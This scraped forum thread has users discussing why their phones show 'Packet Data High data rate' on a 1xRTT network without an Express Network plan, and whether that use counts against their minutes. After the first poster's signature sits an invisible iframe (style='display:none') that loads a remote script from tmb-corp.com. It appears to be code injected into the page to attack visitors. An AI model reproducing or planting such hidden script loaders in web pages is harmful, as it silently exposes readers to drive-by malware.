+ Reply to Thread

Thread: High Data Rate?

High Data Rate?

This morning, for the first time, when I make a data call with either the built in apps or as a modem, I am told about half the time that I am using a "High Data Rate." When using the phone apps, if I visit the phone screen, it says"Packet Data High data rate" and shows a blue logo of up and down arrows at the top of the screen. The windows XP dial up connection says 115.2 kbs, but that might be a function of Venturi.

It does seem faster than qnc, but not as fast as 115.2.

I do't have Express Network. I am in Bergen County, NJ.

Anybody experience anything similar?

GWW<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

HDR is a term used in regards to packet data useage ona 1xRTT network. Nothing really new, just some terminology being displayed we haven't seen before.

1x data rates are capable of 153kbps, but the carrier chokes that done since not all the handsets on the network are 1x yet, and they have to split the network accordingly.

I see the same thing. I do not have EN and see this about half the time. I haven't used it as a modem for my desktop more than a few times, so I can't say much about the speed. Is the message wrong, or are we actually getting the high speed without being subscribed??

Sorry to bump this, but I really need a resolution for this. I don't have that many minutes, and whenever I see "high data rate", the call doesn't get logged! I do not have EN, so why does it say "high data rate?" If this is coming out of my plan minutes, Minute Counter won't tell me!

You might want to check out my experience here:
    http://www.smartphonesource.com/vbul...7908#post67908
    I don't have EN either but consider it a "gift".